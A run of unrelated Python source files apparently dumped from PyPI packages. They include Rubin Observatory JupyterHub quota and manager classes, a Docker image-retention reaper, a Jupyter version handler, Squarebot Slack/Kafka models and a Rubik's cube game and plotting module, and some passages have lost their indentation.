                self.log.warning("No resource map; cannot generate quota.")
                return
            resources = {"size_index": 0, "cpu_quota": 0, "mem_quota": 0}
            gnames = self.parent.user.groups
            uname = self.parent.user.escaped_name
            for resdef in self.resourcemap:
                apply = False
                if resdef.get("disabled"):
                    continue
                candidate = resdef.get("resources")
                if not candidate:
                    continue
                self.log.debug(
                    "Considering candidate resource map {}".format(resdef)
                )
                ruser = resdef.get("user")
                rgroup = resdef.get("group")
                if ruser and ruser == uname:
                    self.log.debug("User resource map match.")
                    apply = True
                if rgroup and rgroup in gnames:
                    self.log.debug("Group resource map match.")
                    apply = True
                if apply:
                    # Take the per-field maximum over all matching entries.
                    for fld in ["size_index", "cpu_quota", "mem_quota"]:
                        vv = candidate.get(fld)
                        if vv and vv > resources[fld]:
                            resources[fld] = vv
            self.log.debug(
                "Setting custom resources '{}'".format(resources)
                + "for user '{}'".format(uname)
            )
            self.custom_resources = resources

    def _create_resource_map(self):
        """Load the resource map JSON file named in the configuration."""
        with start_action(action_type="_create_resource_map"):
            resource_file = self.parent.config.resource_map
            if not os.path.exists(resource_file):
                nf_msg = (
                    "Could not find resource definition file"
                    + " at '{}'".format(resource_file)
                )
                self.log.error(nf_msg)
                return
            with open(resource_file, "r") as rf:
                resmap = json.load(rf)
            self.resourcemap = resmap

    # Brought in from namespacedkubespawner
    def ensure_namespaced_resource_quota(self, quotaspec):
        """Create K8s quota object if necessary.

        A 409 Conflict (already exists) is treated as success; any other
        API error is re-raised.
        """
        with start_action(action_type="ensure_namespaced_resource_quota"):
            self.log.debug("Entering ensure_namespaced_resource_quota()")
            namespace = self.parent.namespace_mgr.namespace
            api = self.parent.api
            if namespace == "default":
                self.log.error("Will not create quota for default namespace!")
                return
            quota = client.V1ResourceQuota(
                metadata=client.V1ObjectMeta(
                    name="quota",
                ),
                spec=quotaspec,
            )
            self.log.info("Creating quota: %r" % quota)
            try:
                api.create_namespaced_resource_quota(namespace, quota)
            except ApiException as e:
                if e.status != 409:
                    self.log.exception(
                        "Create resourcequota '%s'" % quota
                        + "in namespace '%s' " % namespace
                        + "failed: %s",
                        str(e),
                    )
                    raise
                else:
                    self.log.debug(
                        "Resourcequota '%r' " % quota
                        + "already exists in '%s'." % namespace
                    )

    def destroy_namespaced_resource_quota(self):
        """Destroys the Kubernetes namespaced resource quota.
        You don't usually have to call this, since it will get
        cleaned up as part of namespace deletion.
        """
        with start_action(action_type="destroy_namespaced_resource_quota"):
            namespace = self.parent.namespace_mgr.namespace
            api = self.parent.api
            # Bug fix: the quota object is created with the literal name
            # "quota" (see ensure_namespaced_resource_quota), not
            # "quota-<namespace>"; deleting the old composite name could
            # never match the object that was created.
            qname = "quota"
            dopts = client.V1DeleteOptions()
            self.log.info("Deleting resourcequota '%s'" % qname)
            api.delete_namespaced_resource_quota(qname, namespace, dopts)

    def dump(self):
        """Return contents dict for pretty-printing/aggregation."""
        qd = {
            "parent": str(self.parent),
            "quota": self.quota,
            "custom_resources": self.custom_resources,
            "resourcemap": self.resourcemap,
        }
        return qd

    def toJSON(self):
        """Serialize dump() output as a JSON string."""
        return json.dumps(self.dump())
import json
from .. import Loggable
from .apimanager import RubinAPIManager
from .envmanager import RubinEnvironmentManager
from .namespacemanager import RubinNamespaceManager
from .optionsformmanager import RubinOptionsFormManager
from .quotamanager import RubinQuotaManager
from .volumemanager import RubinVolumeManager
class RubinMiddleManager(Loggable):
    """The RubinMiddleManager is a class that holds references to various
    Rubin-specific management objects and delegates requests to them.
    The idea is that an Rubin Spawner could instantiate a single
    RubinMiddleManager, which would then be empowered to perform all
    Rubin-specific operations, reducing configuration complexity.
    """

    def __init__(self, *args, **kwargs):
        # The superclass sees the full kwargs first; our own keyword
        # arguments are popped out afterwards, exactly as before.
        super().__init__(*args, **kwargs)
        for attr in ("config", "parent", "authenticator", "spawner", "user"):
            setattr(self, attr, kwargs.pop(attr, None))
        self.log.info(
            f"Parent of Rubin Middle Manager is '{self.parent}'"
        )
        # Instantiate the sub-managers in the original order; each gets a
        # back-reference to this middle manager.
        self.api_mgr = RubinAPIManager(parent=self)
        self.env_mgr = RubinEnvironmentManager(parent=self)
        self.namespace_mgr = RubinNamespaceManager(parent=self)
        self.optionsform_mgr = RubinOptionsFormManager(parent=self)
        self.quota_mgr = RubinQuotaManager(parent=self)
        self.volume_mgr = RubinVolumeManager(parent=self)
        # Convenience aliases for the Kubernetes API clients.
        self.api = self.api_mgr.api
        self.rbac_api = self.api_mgr.rbac_api

    def dump(self):
        """Return contents dict to pretty-print."""
        state = {
            "parent": str(self.parent),
            "authenticator": str(self.authenticator),
            "api": str(self.api),
            "rbac_api": str(self.rbac_api),
            "config": self.config.dump(),
            "api_mgr": self.api_mgr.dump(),
            "env_mgr": self.env_mgr.dump(),
            "optionsform_mgr": self.optionsform_mgr.dump(),
            "quota_mgr": self.quota_mgr.dump(),
            "volume_mgr": self.volume_mgr.dump(),
        }
        if self.user:
            state["user"] = "{}".format(self.user)
        if self.spawner:
            state["spawner"] = self.spawner.dump()
        return state

    def toJSON(self):
        """Serialize dump() output as a JSON string."""
        return json.dumps(self.dump())
import os
import requests
from eliot import start_action
from . import SingletonScanner
class Reaper(SingletonScanner):
    """Class to allow implementation of image retention policy."""

    # We don't need to categorize releases since we never delete any of
    # them.
    def __init__(self, *args, **kwargs):
        # Retention counts: how many of each image class to keep.
        self.keep_experimentals = kwargs.pop("keep_experimentals", 10)
        self.keep_dailies = kwargs.pop("keep_dailies", 15)
        self.keep_weeklies = kwargs.pop("keep_weeklies", 78)
        # When True, only log what would be deleted.
        self.dry_run = kwargs.pop("dry_run", False)
        # Alias for reap(), presumably for a whimsical external API.
        self.more_cowbell = self.reap
        super().__init__(**kwargs)
        self.logger.debug(
            (
                "Keeping: {} weeklies, {} dailies, and {} " + "experimentals."
            ).format(
                self.keep_weeklies, self.keep_dailies, self.keep_experimentals
            )
        )
        # NOTE(review): this check has no scheme, while _delete_from_repo
        # checks "https://registry.hub.docker.com" -- only one of the two
        # can match a given registry_url format; confirm which is intended.
        self.delete_tags = False
        if self.registry_url.startswith("registry.hub.docker.com"):
            self.delete_tags = True
        # tag -> manifest hash for the images selected for deletion.
        self.reapable = {}
        # type -> [tag, ...] buckets built by _categorize_tags().
        self._categorized_tags = {}

    def _categorize_tags(self):
        """Bucket scanned tags by type (weekly/daily/experimental) and
        collect obsolete prerelease tags."""
        self._categorized_tags = {
            "weekly": [],
            "daily": [],
            "experimental": [],
        }
        with start_action(action_type="_categorize_tags"):
            self.scan_if_needed()
            rresults = self._reduced_results  # already sorted
            for res in rresults:
                rt = res["type"]
                if rt in ["weekly", "daily", "experimental"]:
                    self.logger.debug("Found image {}".format(res))
                    self._categorized_tags[rt].append(res["name"])
            _, old_prereleases = self._prune_releases()
            self._categorized_tags["obsolete_prereleases"] = [
                x["name"] for x in old_prereleases
            ]

    def _select_victims(self):
        """Populate self.reapable with tag -> hash for every image past
        its retention count, plus all obsolete prereleases."""
        # NOTE(review): the action label "_select victims" (with a space)
        # looks like a typo, but it is a runtime string, so left as-is.
        with start_action(action_type="_select victims"):
            self._categorize_tags()
            reaptags = []
            sc = self._categorized_tags
            # Lists are sorted newest-first, so slicing past the keep
            # count yields the oldest images.
            reaptags.extend(sc["experimental"][self.keep_experimentals :])
            reaptags.extend(sc["daily"][self.keep_dailies :])
            reaptags.extend(sc["weekly"][self.keep_weeklies :])
            reaptags.extend(sc["obsolete_prereleases"])
            reapable = {}
            for r in reaptags:
                reapable[r] = self._results_map[r]["hash"]
            self.logger.debug("Images to reap: {}.".format(reapable))
            self.reapable = reapable

    def report_reapable(self):
        """Return a space-separated list of reapable images."""
        with start_action(action_type="report_reapable"):
            self._select_victims()
            return " ".join(self.reapable.keys())

    def reap(self):
        """Select and delete images."""
        with start_action(action_type="reap"):
            self._select_victims()
            self._delete_from_repo()

    def _delete_from_repo(self):
        """Delete the selected manifests from the registry (or delegate
        to the Docker Hub tag API), honoring dry_run."""
        with start_action(action_type="_delete_from_repo"):
            tags = list(self.reapable.keys())
            if not tags:
                self.logger.info("No images to reap.")
                return
            if self.dry_run:
                self.logger.info("Dry run: images to reap: {}".format(tags))
                return
            headers = {
                "Accept": (
                    "application/vnd.docker.distribution.manifest." + "v2+json"
                )
            }
            sc = 0
            # Docker Hub does not support manifest DELETE; use its
            # tag-deletion API instead.
            if self.registry_url.startswith("https://registry.hub.docker.com"):
                self._delete_tags_from_docker_hub()
                return
            for t in tags:
                self.logger.debug("Attempting to reap '{}'.".format(t))
                h = self.reapable[t]
                # Registry v2 deletes manifests by digest, not by tag.
                path = self.registry_url + "manifests/" + h
                resp = requests.delete(path, headers=headers)
                sc = resp.status_code
                if sc == 401:
                    auth_hdr = self._authenticate_to_repo(resp)
                    headers.update(auth_hdr)  # Retry with new auth
                    self.logger.warning("Retrying with new authentication.")
                    resp = requests.delete(path, headers=headers)
                    sc = resp.status_code
                if (sc >= 200) and (sc < 300):
                    # Got it.
                    del self._results_map[t]
                else:
                    self.logger.warning("DELETE {} => {}".format(path, sc))
                    self.logger.warning("Headers: {}".format(resp.headers))
                    self.logger.warning("Body: {}".format(resp.text))
            if self.cachefile:
                self._writecachefile()  # Remove deleted tags

    def _delete_tags_from_docker_hub(self):
        # This is, of course, completely different from the published API
        # https://github.com/docker/hub-feedback/issues/496
        with start_action(action_type="_delete_tags_from_docker_hub"):
            self.logger.info("Deleting tags from Docker Hub.")
            r_user = self.config.reaper_user
            r_pw = self.config.reaper_password
            data = {"username": r_user, "password": r_pw}
            headers = {
                "Content-Type": "application/json",
                "Accept": "application/json",
            }
            token = None
            # Exchange username/pw for token
            if r_user and r_pw:
                resp = requests.post(
                    "https://hub.docker.com/v2/users/login",
                    headers=headers,
                    json=data,
                )
                r_json = resp.json()
                if r_json:
                    token = r_json.get("token")
                else:
                    self.logger.warning("Failed to authenticate:")
                    self.logger.warning("Headers: {}".format(resp.headers))
                    self.logger.warning("Body: {}".format(resp.text))
            else:
                self.logger.error("Did not have username and password.")
            if not token:
                self.logger.error("Could not acquire JWT token.")
                return
            headers["Authorization"] = "JWT {}".format(token)
            tags = list(self.reapable.keys())
            for t in tags:
                path = (
                    "https://hub.docker.com/v2/repositories/"
                    + self.owner
                    + "/"
                    + self.name
                    + "/tags/"
                    + t
                    + "/"
                )
                self.logger.info("Deleting tag '{}'".format(t))
                resp = requests.delete(path, headers=headers)
                sc = resp.status_code
                if (sc < 200) or (sc >= 300):
                    self.logger.warning("DELETE {} => {}".format(path, sc))
                    self.logger.warning("Headers: {}".format(resp.headers))
                    self.logger.warning("Body: {}".format(resp.text))
                    if sc != 404:
                        continue
                # It's already gone, so remove from map!
                del self._results_map[t]
            if self.cachefile:
                self._writecachefile()  # Remove deleted tags
import json
import os
from notebook.utils import url_path_join as ujoin
from notebook.base.handlers import APIHandler
def _label_from_fields(version_config):
# Parse the image ref into fields we want to display; do the work
# here and return an object with computed fields to our caller so
# the UI side can be very dumb.
# Start with the fields that came in from the Lab container context
# Get rid of host/owner if any in image reference
display_desc = version_config["image_description"]
display_name = version_config["jupyter_image"].split("/")[-1]
display_hash = version_config["image_digest"]
# If we have a description, put parens around the image name; if we don't,
# use the image name as our main text, since description is empty.
if display_desc != "":
display_name = f" ({display_name})"
# If we have a digest, format it for display (remove algorithm and
# truncate to 8 characters, then add an ellipsis and put the whole thing
# in square brackets).
if display_hash != "":
trunc_hash = (display_hash.split(":")[-1])[:8]
display_hash = f" [ {trunc_hash}... ] "
# Then just concatenate them all together
label=f"{display_desc}{display_name}{display_hash}"
return label
class DisplayVersion_handler(APIHandler):
    """
    DisplayVersion Handler. Return the JSON representation of our
    Lab version information.
    """

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # Version fields are resolved once per handler instantiation:
        # each symbol comes from a mounted file or an env var fallback.
        self.version_config={}
        for i in ["JUPYTER_IMAGE", "IMAGE_DESCRIPTION", "IMAGE_DIGEST"]:
            self.version_config[i.lower()] = self._files_then_env(i)
        # Pre-compute the human-readable label so the UI stays dumb.
        self.version_config["label"] = _label_from_fields(
            self.version_config)

    def get(self):
        """Return the resolved version settings as a JSON document.
        """
        self.log.info("Sending Display Version settings")
        self.finish(json.dumps(self.version_config))

    def _files_then_env(self, symbol):
        """Try to extract a symbol. First use the path at which it should be
        mounted into the container. If that doesn't exist or isn't
        readable, try the environment variable of the same name. If
        neither of those works, return the empty string.
        """
        basedir = "/opt/lsst/software/jupyterlab/environment"
        val = ""
        try:
            fn = os.path.join(basedir, symbol)
            with open(fn, "r") as f:
                val = f.read()
        except Exception as e:
            self.log.warning(f"Could not read from {fn}: {e}; trying env var.")
            val = os.getenv(symbol, "")
        return val
def setup_handlers(web_app):
    """Register the display_version API route with the notebook server."""
    host_pattern = ".*$"
    # Respect any base URL prefix the server was started with.
    base_url = web_app.settings["base_url"]
    route = ujoin(base_url, r"/rubin/display_version")
    web_app.add_handlers(host_pattern, [(route, DisplayVersion_handler)])
from __future__ import annotations
import json
from typing import Any, Self
from dataclasses_avroschema.avrodantic import AvroBaseModel
from pydantic import Field
from .slack import SlackChannelType, SlackMessageEvent, SlackMessageType
__all__ = [
"SquarebotSlackMessageKey",
"SquarebotSlackMessageValue",
"SquarebotSlackAppMentionValue",
]
class SquarebotSlackMessageKey(AvroBaseModel):
    """Kafka message key model for Slack messages sent by Squarebot."""

    # Keying by channel means that, with Kafka's default partitioner,
    # all messages from one channel hash to the same partition, keeping
    # per-channel ordering for consumers.
    channel: str = Field(..., description="The Slack channel ID.")

    class Meta:
        """Metadata for the model."""

        namespace = "lsst.square-events.squarebot.messages"
        schema_name = "key"

    @classmethod
    def from_event(cls, event: SlackMessageEvent) -> Self:
        """Create a Kafka key for a Slack message from a Slack event.
        Parameters
        ----------
        event
            The Slack event.
        Returns
        -------
        key
            The Squarebot message key.
        """
        return cls(channel=event.event.channel)
class SquarebotSlackMessageValue(AvroBaseModel):
    """Kafka message value model for Slack messages sent by Squarebot.
    This value schema should be paired with `SquarebotSlackMessageKey` for
    the key schema.
    """

    type: SlackMessageType = Field(..., description="The Slack event type.")
    channel: str = Field(..., description="The Slack channel ID.")
    channel_type: SlackChannelType = Field(
        ..., description="The Slack channel type."
    )
    user: str = Field(
        ..., description="The ID of the user that sent the message."
    )
    ts: str = Field(
        ...,
        description=(
            "The Slack message timestamp. This is string-formatted to allow "
            "comparison with other Slack messges which use the ``ts`` to "
            "identify and reference messages."
        ),
    )
    text: str = Field(..., description="The Slack message text content.")
    # Holds the complete raw payload (JSON-serialized in from_event) so
    # downstream consumers can re-parse fields not modeled here.
    slack_event: str = Field(
        ..., description="The original Slack event JSON string."
    )

    class Meta:
        """Metadata for the model."""

        namespace = "lsst.square-events.squarebot.messages"
        schema_name = "value"

    @classmethod
    def from_event(cls, event: SlackMessageEvent, raw: dict[str, Any]) -> Self:
        """Create a Kafka value for a Slack message from a Slack event.
        Parameters
        ----------
        event
            The Slack event.
        raw
            The raw Slack event JSON.
        Returns
        -------
        value
            The Squarebot message value.
        """
        return cls(
            type=event.event.type,
            channel=event.event.channel,
            channel_type=event.event.channel_type,
            user=event.event.user,
            ts=event.event.ts,
            text=event.event.text,
            slack_event=json.dumps(raw),
        )
class SquarebotSlackAppMentionValue(AvroBaseModel):
    """Kafka message value model for Slack app_mention message sent by
    Squarebot.
    These are like `SquarebotSlackMessageValue` but lack a `channel_type`
    field.
    This value schema should be paired with `SquarebotSlackMessageKey` for
    the key schema.
    """

    type: SlackMessageType = Field(..., description="The Slack event type.")
    channel: str = Field(..., description="The Slack channel ID.")
    user: str = Field(
        ..., description="The ID of the user that sent the message."
    )
    ts: str = Field(
        ...,
        description=(
            "The Slack message timestamp. This is string-formatted to allow "
            "comparison with other Slack messges which use the ``ts`` to "
            "identify and reference messages."
        ),
    )
    text: str = Field(..., description="The Slack message text content.")
    slack_event: str = Field(
        ..., description="The original Slack event JSON string."
    )

    class Meta:
        """Metadata for the model."""

        namespace = "lsst.square-events.squarebot.appmention"
        schema_name = "value"

    @classmethod
    def from_event(cls, event: SlackMessageEvent, raw: dict[str, Any]) -> Self:
        """Create a Kafka value for a Slack message from a Slack event.
        Parameters
        ----------
        event
            The Slack event.
        raw
            The raw Slack event JSON.
        Returns
        -------
        value
            The Squarebot message value.
        """
        # Bug fix: this model intentionally has no ``channel_type`` field
        # (app_mention events don't carry one), so we must not forward
        # event.event.channel_type to the constructor.
        return cls(
            type=event.event.type,
            channel=event.event.channel,
            user=event.event.user,
            ts=event.event.ts,
            text=event.event.text,
            slack_event=json.dumps(raw),
        )
from __future__ import annotations
from enum import Enum
from typing import Optional
from pydantic import BaseModel, Field
__all__ = [
"BaseSlackEvent",
"SlackUrlVerificationEvent",
"SlackMessageEvent",
"SlackMessageType",
"SlackChannelType",
"SlackMessageEventContent",
"SlackBlockAction",
"SlackUser",
"SlackTeam",
"SlackChannel",
]
class BaseSlackEvent(BaseModel):
    """A model for the minimal request payload from Slack for an event.
    Any event message is gauranteed to have these fields. For specific types of
    events, re-parse the request body with a specific model such as
    `SlackMessageEvent`. For information about all the Slack event types, see
    https://api.slack.com/events.
    """

    # Outer-envelope type only; the inner event's type lives in
    # SlackMessageEventContent.type.
    type: str = Field(
        ...,
        description=(
            "The Slack event type in the message's outer scope; typically "
            "this is ``url_verification`` or ``event_callback``."
        ),
    )
class SlackUrlVerificationEvent(BaseSlackEvent):
    """A Slack ``url_verification`` event."""

    # Slack expects this challenge string echoed back to verify the
    # request URL during app setup.
    challenge: str = Field(..., description="URL challenge content.")
class SlackMessageType(str, Enum):
    """Types of Slack message events handled by Squarebot."""

    app_mention = "app_mention"
    message = "message"
class SlackChannelType(str, Enum):
    """Types of Slack channels a message can originate from."""

    channel = "channel"  # public channel
    group = "group"  # private channel
    im = "im"  # direct message
    mpim = "mpim"  # multi-person direct message
class SlackMessageEventContent(BaseModel):
    """A model for the ``event`` field inside a message event.
    See https://api.slack.com/events/app_mention and
    https://api.slack.com/events/message.
    """

    type: SlackMessageType = Field(description="The Slack message type.")
    channel: str = Field(
        description=(
            "ID of the channel where the message was sent "
            "(e.g., C0LAN2Q65)."
        )
    )
    # Explicit None default added: app_mention payloads omit channel_type,
    # and an Optional field without a default is *required* under
    # pydantic v2. This also matches the ``authed_users`` pattern in
    # SlackMessageEvent.
    channel_type: Optional[SlackChannelType] = Field(
        None,
        description=(
            "The type of channel (public, direct im, etc..). This is null for "
            "``app_mention`` events."
        ),
    )
    user: str = Field(
        description="The ID of the user that sent the message (eg U061F7AUR)."
    )
    text: str = Field(description="Content of the message.")
    ts: str = Field(description="Timestamp of the message.")
    event_ts: str = Field(description="When the event was dispatched.")
class SlackMessageEvent(BaseSlackEvent):
    """A Slack event for message events in general.
    See https://api.slack.com/events/app_mention and
    https://api.slack.com/events/message.
    """

    team_id: str = Field(
        description=(
            "The unique identifier of the workspace where the event occurred."
        )
    )
    api_app_id: str = Field(
        description=(
            "The unique identifier of your installed Slack application. Use "
            "this to distinguish which app the event belongs to if you use "
            "multiple apps with the same Request URL."
        )
    )
    event_id: str = Field(
        description=(
            "A unique identifier for this specific event, globally unique "
            "across all workspaces."
        )
    )
    event_time: int = Field(
        description=(
            "The epoch timestamp in seconds indicating when this event was "
            "dispatched."
        )
    )
    authed_users: Optional[list[str]] = Field(
        None,
        description=(
            "An array of string-based User IDs. Each member of the collection "
            "represents a user that has installed your application/bot and "
            "indicates the described event would be visible to those users."
        ),
    )
    # The inner event payload (message/app_mention details).
    event: SlackMessageEventContent
class SlackUser(BaseModel):
    """A model for the user field in Slack interaction payloads."""

    id: str = Field(description="ID of the user.")
    username: str = Field(description="User name of the user.")
    team_id: str = Field(description="The user's team.")
class SlackTeam(BaseModel):
    """A model for the team field in Slack interaction payloads."""

    id: str = Field(description="ID of the team.")
    domain: str = Field(description="Domain name of the team.")
class SlackChannel(BaseModel):
    """A model for the channel field in Slack interaction payloads."""

    id: str = Field(description="ID of the channel.")
    name: str = Field(description="Name of the channel.")
class SlackBlockAction(BaseModel):
"""A model for a Slack Block kit interaction.
This isn't yet a full model for a block action payload; experience is
needed to fully understand what the payloads are for the types of
interactions we use.
See https://api.slack.com/reference/interaction-payloads/block-actions
"""
type: str = Field(description="Should be `block_actions`.")
trigger_id: str = Field(
description="A short-lived ID used to launch modals."
)
api_app_id: str = Field(
description=(
"The unique identifier of your installed Slack application. Use "
"this to distinguish which app the event belongs to if you use "
"multiple apps with the same Request URL."
)
)
response_url: str = Field(
description=(
"A short-lived URL to send message in response to interactions."
)
)
user: SlackUser = Field(
description=(
"Information about the user that triggered the interaction."
)
)
team: SlackTeam = Field(description="Information about the Slack team.")
channel: SlackChannel = Field(
description="Information about the Slack channel."
) | /rubin_squarebot-0.7.0-py3-none-any.whl/rubinobs/square/squarebot/models/slack.py | 0.961696 | 0.33846 | slack.py | pypi |
import os
import sys
import json
import warnings
from typing import List, Tuple, Dict
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.patches as patches
from matplotlib.axes import Axes
from mpl_toolkits.mplot3d import Axes3D
from itertools import product, combinations
from .cube import Cube
def is_3d_axes(ax : plt.Axes) -> bool:
    """Checks whether ``ax`` is a :class:`matplotlib Axes
    <matplotlib.axes.Axes>` configured for 3-D plotting.

    Args:
        ax (plt.Axes): Object to be tested for being a
            :class:`plt.Axes <matplotlib.axes.Axes>` with a 3-D
            projection.

    Returns:
        bool: ``True`` if ``ax`` is a
        :class:`matplotlib Axes <matplotlib.axes.Axes>` whose projection
        name is ``'3d'``, ``False`` otherwise.
    """
    # A 3-D projection is still an Axes subclass; its projection is
    # reported via the ``name`` attribute.  Short-circuiting ``and``
    # guards the attribute access, and returning the boolean expression
    # directly avoids the if/return-True/else/return-False anti-pattern.
    return isinstance(ax, plt.Axes) and ax.name == '3d'
def plot_cube_3D(ax : plt.Axes , cube : Cube):
"""Plots the :class:`Rubix Cube <rubix_cube.cube.Cube>` on an interactive
3-D :class:`matplotlib Axes <matplotlib.axes.Axes>` with non-visible faces
from the current orientation being displayed in visible reflections.
Args:
ax (plt.Axes): The :class:`matplotlib Axes <matplotlib.axes.Axes>`
on which the plotting will be done.
cube (Cube): :class:`Rubix Cube <rubix_cube.cube.Cube>` that will be
plotted in a 3-D projection.
"""
# Ensures arguments are valid
if is_3d_axes(ax)\
and isinstance(cube , Cube)\
and cube.is_well_formed():
# draw cube
r = [-1, 1]
for s, e in combinations(np.array(list(product(r, r, r))), 2):
if np.sum(np.abs(s-e)) == r[1]-r[0]:
ax.plot3D(*zip(s, e), color="b") | /rubix_cube-0.1.9.tar.gz/rubix_cube-0.1.9/rubix_cube/plot_cube_3d.py | 0.743447 | 0.661089 | plot_cube_3d.py | pypi |
from pathlib import Path
from random import randint , randrange
import os
import sys
import json
import warnings
from typing import List, Tuple, Dict
import numpy as np
from .cube import Cube
class Cube_Game(object):
    """Game controller that owns a :class:`Cube` and applies/logs moves.

    Wraps an instance of the :class:`Cube` class, exposing named move
    mnemonics (``'F'``, ``'Ri'``, ``'X'``, ...) and recording every cube
    manipulation and game event in the JSON-style :attr:`game_log`.

    Attributes:
        EVENT_TYPES (List[str]): Every event ``type`` value permitted in
            the :attr:`game_log` (the 24 move mnemonics plus the
            ``<<__...__>>`` life-cycle markers).
        CUBE_FUNCS (Dict[str,callable]): Maps each move mnemonic to the
            corresponding unbound :class:`Cube` method.
        INVERSE_FUNCS (Dict[str,str]): Maps each move mnemonic to the
            mnemonic of the move that undoes it.
        __game_cube (Cube): :class:`Rubix Cube <Cube>` that is manipulated
            throughout game-play.
        __game_log (dict): Historical record of all moves, rotations, and
            other game events that manipulate the :attr:`game_cube`.
        __game_name (str): Name of the game.
        __verbose (bool): [DEBUG]-style console output. Default value is
            ``False``.
    """

    #==========================================================================
    # CONSTANTS FOR CUBE GAME(s)
    #==========================================================================
    EVENT_TYPES = ['<<__NEW_GAME__>>',
                   'F',
                   'Fi',
                   'B',
                   'Bi',
                   'L',
                   'Li',
                   'R',
                   'Ri',
                   'U',
                   'Ui',
                   'D',
                   'Di',
                   'M',
                   'Mi',
                   'E',
                   'Ei',
                   'S',
                   'Si',
                   'X',
                   'Xi',
                   'Y',
                   'Yi',
                   'Z',
                   'Zi',
                   '<<__START_SCRAMBLE__>>',
                   '<<__END_SCRAMBLE__>>',
                   '<<__COLOR_CHANGE__>>',
                   '<<__SAVE_GAME__>>',
                   '<<__LOAD_GAME__>>',
                   '<<__PAUSE_GAME__>>',
                   '<<__RESUME_GAME__>>',
                   '<<__SOLVE_CUBE__>>',
                   '<<__QUIT_GAME__>>']

    CUBE_FUNCS = {'U'  : Cube.move_up,
                  'Ui' : Cube.move_up_inverse,
                  'D'  : Cube.move_down,
                  'Di' : Cube.move_down_inverse,
                  'L'  : Cube.move_left,
                  'Li' : Cube.move_left_inverse,
                  'R'  : Cube.move_right,
                  'Ri' : Cube.move_right_inverse,
                  'F'  : Cube.move_front,
                  'Fi' : Cube.move_front_inverse,
                  'B'  : Cube.move_back,
                  'Bi' : Cube.move_back_inverse,
                  'M'  : Cube.move_middle,
                  'Mi' : Cube.move_middle_inverse,
                  'E'  : Cube.move_equator,
                  'Ei' : Cube.move_equator_inverse,
                  'S'  : Cube.move_standing,
                  'Si' : Cube.move_standing_inverse,
                  'X'  : Cube.rotate_pitch,
                  'Xi' : Cube.rotate_pitch_inverse,
                  'Y'  : Cube.rotate_yaw,
                  'Yi' : Cube.rotate_yaw_inverse,
                  'Z'  : Cube.rotate_roll,
                  'Zi' : Cube.rotate_roll_inverse}

    INVERSE_FUNCS = {'U'  : 'Ui',
                     'Ui' : 'U',
                     'D'  : 'Di',
                     'Di' : 'D',
                     'L'  : 'Li',
                     'Li' : 'L',
                     'R'  : 'Ri',
                     'Ri' : 'R',
                     'F'  : 'Fi',
                     'Fi' : 'F',
                     'B'  : 'Bi',
                     'Bi' : 'B',
                     'M'  : 'Mi',
                     'Mi' : 'M',
                     'E'  : 'Ei',
                     'Ei' : 'E',
                     'S'  : 'Si',
                     'Si' : 'S',
                     'X'  : 'Xi',
                     'Xi' : 'X',
                     'Y'  : 'Yi',
                     'Yi' : 'Y',
                     'Z'  : 'Zi',
                     'Zi' : 'Z'}

    #==========================================================================
    # CLASS CONSTRUCTOR
    #==========================================================================
    def __init__(self,
                 cube      : Cube = None,
                 game_name : str  = None,
                 game_log  : Dict = None,
                 scramble  : bool = False,
                 verbose   : bool = False):
        """:class:`Cube_Game` class constructor.

        Args:
            cube (Cube, optional): :class:`Cube` that will be directly
                manipulated throughout gameplay.  Invalid values fall
                back to a new solved default :class:`Cube`.
            game_name (str, optional): Name of the current game being
                played.  Invalid values fall back to
                ``'Untitled_Cube_Game'``.
            game_log (Dict, optional): Dictionary that contains a history
                of moves and other game events.  Invalid values fall back
                to a fresh log.
            scramble (bool, optional): Whether or not the game should
                scramble the :attr:`game_cube` upon initialization.
                Default value is ``False``.
            verbose (bool, optional): [DEBUG]-style console output.
                Default value is ``False``.
        """
        # Sets up a default game first; the property setters silently
        # reject invalid values, so these defaults survive bad arguments.
        self.game_name = 'Untitled_Cube_Game'
        self.game_name = game_name
        self.game_cube = Cube()
        self.game_log  = {'events' : [{'type' : '<<__NEW_GAME__>>',
                                       'name' : self.game_name}]}

        # Attempts to reset property values with argument values.
        self.game_cube = cube
        self.game_log  = game_log
        self.verbose   = verbose

        # Initializes a default cube
        if self.game_cube == Cube():
            if self.verbose:
                print(f"\n[DEBUG]\tNew DEFAULT Cube created for game : '{self.game_name}'\n")

        # Initializes a default game log
        if self.game_log != game_log:
            if self.verbose:
                print(f"\n[DEBUG]\tNew DEFAULT ``game_log`` created for game : '{self.game_name}'\n")
        else:
            self.game_log['events'].append({'type' : '<<__NEW_GAME__>>',
                                            'name' : self.game_name})

        if self.verbose:
            print(f"\n[DEBUG]\tNew game created with name : '{self.game_name}'\n")

        # Bug fix: the ``scramble`` flag was previously accepted but never
        # acted upon.  When requested, apply a semi-random move sequence,
        # book-ended by scramble markers in the game log.
        if scramble:
            self.game_log['events'].append(
                {'type' : '<<__START_SCRAMBLE__>>'})
            for move in Cube_Game.get_scramble_sequence():
                self.manipulate_cube(move)
            self.game_log['events'].append(
                {'type' : '<<__END_SCRAMBLE__>>'})

    #==========================================================================
    # PROPERTY INTERFACE(s)
    #==========================================================================
    @property
    def game_cube(self) -> Cube:
        """:class:`Rubix Cube <Cube>` object being manipulated in game.
        Assignments that are not well-formed :class:`Cube` instances are
        silently ignored.
        """
        return self.__game_cube

    @game_cube.setter
    def game_cube(self , cube : Cube):
        if isinstance(cube, Cube)\
        and cube.is_well_formed():
            self.__game_cube = cube

    @property
    def game_name(self) -> str:
        """Name of the game.  Assignments of empty or non-``str`` values
        are silently ignored.
        """
        return self.__game_name

    @game_name.setter
    def game_name(self, name : str):
        if isinstance(name, str)\
        and len(name) > 0:
            self.__game_name = name

    @property
    def game_log(self) -> Dict:
        """JSON-style :class:`dict` recording all actions done to the
        :attr:`game_cube`.  The log is a ``{'events': [...]}`` mapping in
        which every event is a :class:`dict` carrying a ``type`` key whose
        value is one of :attr:`EVENT_TYPES`.  Assignments that do not
        satisfy that shape are silently ignored.
        """
        return self.__game_log

    @game_log.setter
    def game_log(self, game_log : Dict):
        if isinstance(game_log, dict)\
        and 'events' in game_log\
        and isinstance(game_log['events'], list)\
        and len(game_log['events']) > 0\
        and all([isinstance(event, dict) for event in game_log['events']]):

            # Has to ensure that all event types are valid
            valid_log = all(['type' in event\
                             and event['type'] in Cube_Game.EVENT_TYPES\
                             for event in game_log['events']])

            if valid_log:
                self.__game_log = game_log

    @property
    def verbose(self) -> bool:
        """[DEBUG]-style console output. Default value is ``False``."""
        return self.__verbose

    @verbose.setter
    def verbose(self, verbose : bool):
